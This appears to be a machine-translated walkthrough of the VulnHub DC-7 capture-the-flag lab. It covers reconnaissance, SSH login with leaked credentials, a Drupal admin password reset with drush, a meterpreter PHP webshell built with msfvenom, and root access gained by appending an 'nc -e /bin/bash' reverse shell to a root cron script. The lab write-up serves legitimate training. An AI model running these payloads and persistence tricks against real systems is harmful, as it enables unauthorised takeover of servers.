Introduce

series ： DC（ This series consists of 10 platform ）
Release date ：2019 year 8 month 31 Japan
difficulty ： intermediate
Flag： obtain root jurisdiction , And get the only flag
Study ：

• drupal install php Realize hanging horse
• Raise the right

Target address ：https://www.vulnhub.com/entry/dc-7,356/
Get tips from the shooting range ：

• The target is more suitable for Virtualbox
• Don't try to explode , It's hard to succeed.

information gathering

The host found

netdiscover The host found
about VulnHub For the target , appear “PCS Systemtechnik GmbH” It's the target .

netdiscover -i eth0 -r 192.168.1.0/24

Host information detection

Information detection ：nmap -A -p- 192.168.1.125, Only open 22 and 80 port

Visit website

Know that the website is drupal Site , The prompt message on the front page of the website is that we are not recommended to blow up the website .

The directory scan did not find any valuable information , The only interesting thing is the one in the lower left corner “@DC7USER”, I don't know what it is , Google it , Found a twitter account

Get one github Address

Checked , This github The address is the same as the first search result of Google , Then I saw the account number ：dc7user、 password ：MdR3xOgB7#dW

The attempt to log in to the website failed

forehead , Then you have to try ssh Connected to . And then it's connected .

SSH Sign in

information gathering

The only thing that stands out is mbox file . View the mess directly , Use mail -f mbox It is known that there are 9 seal , In order to root Identity runs regularly /opt/scripts/backups.sh The script gets . The shooting range is not yet sudo, Let's see what this script is .

I got a lot of information

analysis ：

1. Because this script executes root jurisdiction , So now we just need to write the bounce in the script shell Command will get root The powers of the shell 了
2. www-data The user has permission to write to the script , So we got www-data User's rebound shell Namely root The powers of the shell
3. drush The order is drupal Specific management tools in the system . You can modify www-data user admin password

modify web Backstage password

modify admin User password is admin：drush user-password admin --password="admin"

Login successful

Hang a horse

There is no place to hang the horse , Read other people's articles , I have gained some insight , It can be installed php Come and hang the horse

1. Found no write php The page of

2. download php：https://www.drupal.org/project/php/releases/8.x-1.1

3. install php

Search for php Positioning position , Check it , And click Install

4. Start hanging horses

because webshell Manage the font size of the tool 、 The background color is not convenient for screenshot display , So I still use msf To do it .

 Create a back door 
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php

 Turn on monitoring 
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit

5. Drop the Trojan horse

6. getshell

Raise the right

rebound shell：echo 'nc -e /bin/bash 192.168.1.118 4444' >> /opt/scripts/backups.sh
kali Turn on monitoring ：nc -nvlp 4444
Because the script is every 15 Run every minute , Sit back and wait for 15 Minutes!

1. Confirm that the command is written successfully

2. Listen to the song , Then you see the establishment nc Connect